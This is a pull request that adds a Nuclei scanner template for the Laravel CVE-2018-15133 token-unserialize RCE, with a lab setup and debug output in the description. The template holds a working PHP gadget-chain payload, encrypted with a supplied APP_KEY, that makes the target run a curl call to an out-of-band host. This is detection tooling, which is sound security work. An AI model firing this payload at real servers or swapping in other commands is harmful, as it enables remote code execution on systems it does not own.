### PR TITLE
CVE-2018-15133 - Laravel Framework X-XSRF-TOKEN Unserialize RCE

### DIFF
--- a/http/cves/2018/CVE-2018-15133.yaml
+++ b/http/cves/2018/CVE-2018-15133.yaml
@@ -1,0 +1,93 @@
+id: CVE-2018-15133
+
+info:
+  name: Laravel Framework 5.5.40/5.6.x - X-XSRF-TOKEN Unserialize RCE
+  author: flame-11
+  severity: critical
+  description: |
+    Laravel Framework versions 5.5.40 and 5.6.0 through 5.6.29 are vulnerable to a PHP
+    object injection issue where an attacker-controlled X-XSRF-TOKEN value is decrypted
+    and unserialized, which can lead to remote code execution when the application key
+    (APP_KEY) is known.
+  impact: |
+    Remote code execution in the web server context.
+  remediation: |
+    Upgrade Laravel to a patched version (>= 5.5.41, >= 5.6.30) and rotate APP_KEY if it
+    may have been exposed.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-15133
+    - https://github.com/projectdiscovery/nuclei-templates/issues/14598
+    - http://packetstormsecurity.com/files/153641/PHP-Laravel-Framework-Token-Unserialize-Remote-Command-Execution.html
+    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/http/laravel_token_unserialize_exec.rb
+  classification:
+    cve-id: CVE-2018-15133
+    cwe-id: CWE-502
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cve,cve2018,laravel,rce,deserialization,kev,vuln
+
+variables:
+  # Provide the target APP_KEY at runtime:
+  # -V app_key=base64:....
+  marker: "{{randstr}}"
+  iv_raw: "{{rand_base(16)}}" # 16-byte IV for AES-256-CBC
+  iv_b64: "{{base64(iv_raw)}}"
+  oast: "{{interactsh-url}}"
+  dq: "{{hex_decode('22')}}" # double-quote (")
+
+  cmd: "{{concat('curl http://', oast, '/?q=', marker)}}"
+  cmd_len: "{{len(cmd)}}"
+
+  # APP_KEY is usually "base64:<44chars>". We sanitize + pad to avoid decode errors.
+  key_b64_raw: "{{replace('{{app_key}}','base64:','')}}"
+  key_b64_filtered: "{{replace_regex(key_b64_raw,'[^A-Za-z0-9+/=]','')}}"
+  key_b64_safe: "{{concat(substr(padding(key_b64_filtered,'A',43,'suffix'),0,43),'=')}}"
+  key_raw: "{{base64_decode(key_b64_safe)}}"
+
+  class_pending_broadcast: 'Illuminate\Broadcasting\PendingBroadcast'
+  class_database_manager: 'Illuminate\Database\DatabaseManager'
+
+  # Protected property names require null-byte prefixes in PHP serialization.
+  prop_events: "{{hex_decode('002a006576656e7473')}}"              # \x00*\x00events
+  prop_app: "{{hex_decode('002a00617070')}}"                       # \x00*\x00app
+  prop_extensions: "{{hex_decode('002a00657874656e73696f6e73')}}"  # \x00*\x00extensions
+
+  # PHP serialized gadget chain (Laravel cookie-unserialize RCE chain).
+  # Note: brace-heavy segments are generated with repeat('}',N) to avoid interfering
+  # with the template engine's own {{ }} delimiters.
+  serialized: >-
+    {{concat(
+      'a:2:{i:7;O:40:', dq, class_pending_broadcast, dq, ':1:{s:9:', dq, prop_events, dq, ';',
+      'O:35:', dq, class_database_manager, dq, ':2:{s:6:', dq, prop_app, dq, ';',
+      'a:1:{s:6:', dq, 'config', dq, ';a:2:{',
+      's:16:', dq, 'database.default', dq, ';s:6:', dq, 'system', dq, ';',
+      's:20:', dq, 'database.connections', dq, ';a:1:{s:6:', dq, 'system', dq, ';a:1:{i:0;',
+      's:', cmd_len, ':', dq, cmd, dq, ';}}}}',
+      's:13:', dq, prop_extensions, dq, ';a:1:{s:6:', dq, 'system', dq, ';s:12:', dq, 'array_filter', dq, ';}}}i:7;i:7;}'
+    )}}
+
+  cipher_raw: "{{aes_cbc(serialized, key_raw, iv_raw)}}"
+  value_b64: "{{base64(cipher_raw)}}"
+  mac: "{{hmac('sha256', concat(iv_b64, value_b64), key_raw)}}"
+  token_json: "{{concat('{', dq, 'iv', dq, ':', dq, iv_b64, dq, ',', dq, 'value', dq, ':', dq, value_b64, dq, ',', dq, 'mac', dq, ':', dq, mac, dq, ',', dq, 'tag', dq, ':', dq, dq, '}')}}"
+  token_b64: "{{base64(token_json)}}"
+  token_url: "{{url_encode(token_b64)}}"
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/poc"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+      # Build a Laravel-encrypted token that decrypts into a serialized object payload.
+      X-XSRF-TOKEN: "{{token_url}}"
+    body: "a=b"
+
+    matchers:
+      - type: word
+        part: interactsh_request
+        words:
+          - "?q={{marker}}"
+
+


### PR DESCRIPTION
/claim #14598

This PR adds a Nuclei template for **CVE-2018-15133** (Laravel Framework token unserialize RCE) with a reproducible Docker lab for validation.

This vulnerability requires knowledge of the Laravel APP_KEY, user need to specify it as variable when running nuclei. 

## Reproduction (Docker lab)

The Docker lab will be shared to `templates@projectdiscovery.io`.

```bash
docker compose up -d --build
```

Lab URL:
- `http://localhost:18088/`

Example Lab APP_KEY (default of the lab, configurable through env.example file):
- `base64:C9keXyMoHkA4Rg40PHuuZakLSC5rpOF7myjb876DQv0=`

## Nuclei command

```bash
nuclei \
  -t http/cves/2018/CVE-2018-15133.yaml \
  -u http://localhost:18088 \
  -V app_key=base64:C9keXyMoHkA4Rg40PHuuZakLSC5rpOF7myjb876DQv0= \
  -debug -nc
```

Nuclei debug (trimmed)
```
[d58vc1ps7aa1hd9fig80dwsmy1d6qatnq] Received HTTP interaction from 193.37.32.32 at 2025-12-29 03:31:20
------------
HTTP Request
------------

GET /?q=37VCvAznHfcZkvXpjBj9rwloiqZ HTTP/1.1
Host: d58vc1ps7aa1hd9fig80dwsmy1d6qatnq.oast.me
Accept: */*
User-Agent: curl/7.64.0

------------
HTTP Response
------------

HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Origin: *
Server: oast.me
X-Interactsh-Version: 1.2.2



[CVE-2018-15133:word-1] [http] [critical] http://localhost:18088/poc
[INF] Scan completed in 20.788305282s. 1 matches found.

```